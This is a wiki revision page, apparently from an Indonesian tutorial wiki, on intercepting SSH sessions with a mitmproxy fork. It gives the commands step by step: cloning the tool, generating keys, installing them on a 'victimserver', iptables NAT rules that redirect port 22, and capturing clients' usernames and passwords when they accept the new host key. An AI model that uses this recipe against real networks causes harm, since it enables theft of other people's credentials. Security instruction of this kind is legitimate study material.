Difference between revisions of "MITM: mitm ssh"

From OnnoWiki
Jump to navigation Jump to search
Line 2: Line 2:
  
  
 +
==Download==
  
 +
git clone https://github.com/mitmproxy/mitmproxy.git
  
Quick and Easy SSH MITM
+
==Generate Keys==
Published: Thu 13 March 2014
 
By Andrew Smith
 
  
In Blog.
+
./mitmkeys
 
 
tags: ssh mitm
 
 
 
A quick intro to using mitmproxy to man-in-the-middle an SSH connection.
 
 
 
So you want to sniff an SSH connection (that you have access to) but wireshark is giving you junk? Luckily someone has written a tool for that. The mitmproxy by Maximilian Hils allows you to plop a fake server in between your SSH client and the SSH server you're connecting to.
 
  
I wanted to have a nose at the data sent from git to github over SSH. This is what I did.
+
Ini akan masuk ke ~/.mitmkeys
  
# Download mitmproxy
+
==Instal SSH key yang akan di serang==
git clone https://github.com/mitmproxy/mitmproxy.git
 
 
 
#Generate mitm keys (these go to ~/.mitmkeys)
 
./mitmkeys
 
  
Now you want to install the SSH key you just generated to the server you want to mitm.
+
#Install SSH key
 +
ssh-copy-id -i ~/.mitmkeys/id_rsa.pub user@victimserver
  
#Install SSH key
+
==Jalankan proxy==
ssh-copy-id -i ~/.mitmkeys/id_rsa.pub user@victimserver
 
  
 
Then run the proxy, pointing it at the victimserver.
 
Then run the proxy, pointing it at the victimserver.
  
#Run proxy
+
./mitmproxy_ssh -H victimserver
./mitmproxy_ssh -H victimserver
 
  
 
This runs the proxy on localhost:2222
 
This runs the proxy on localhost:2222
Line 38: Line 27:
 
Now simply connect to the local proxy:
 
Now simply connect to the local proxy:
  
ssh localhost -p 2222
+
ssh localhost -p 2222
  
 
And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh.
 
And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh.

Revision as of 06:56, 7 April 2017

sumber: http://www.atechnote.com/2016/10/intercept-username-and-password-using.html


Download

git clone https://github.com/mitmproxy/mitmproxy.git

Generate Keys

./mitmkeys

Ini akan masuk ke ~/.mitmkeys

Instal SSH key yang akan di serang

#Install SSH key
ssh-copy-id -i ~/.mitmkeys/id_rsa.pub user@victimserver

Jalankan proxy

Then run the proxy, pointing it at the victimserver. 

./mitmproxy_ssh -H victimserver

This runs the proxy on localhost:2222

Now simply connect to the local proxy: 

ssh localhost -p 2222

And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh.





      • setup information

-diagram client --> mitmproxy --> ssh server

- target server ip: 192.168.202.124


1- install dependency packages $ sudo pip install twisted $ sudo apt-get install python-service-identity $ pip install pycrypto

2- download the mitmproxy $ git clone https://github.com/saironiq/mitmproxy.git

3- if you can not run mitmreplay_ssh, it might be there is changing structure of pycrypto of the version you install, so - modify file mitmproxy/mitmproxy/sshdebug.py 

 -- line 655 modify it to below

mpints.append(cnumber.bytes_to_long( 

 -- line 11 add the following line

from Crypto.Util import number as cnumber

4- generate keys $ cd mitmproxy $ sudo ./mitmproxy

5- update ip_forward rule and nat $ sudo sysctl -w net.ipv4.ip_forward=1 $ sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222

6- run the mitmproxy_ssh and point to target server 192.168.202.124 $ sudo ./mitmproxy_ssh -H 192.168.202.124 -s

7- now when our client login to ssh server, if they the don't suspect the new key from server, it is very transparent to client

- snapshot of username and password on our mitmproxy pc when client ssh to server 192.168.202.124



Referensi

Retrieved from "https://onnocenter.or.id/wiki/index.php?title=MITM:_mitm_ssh&oldid=47543"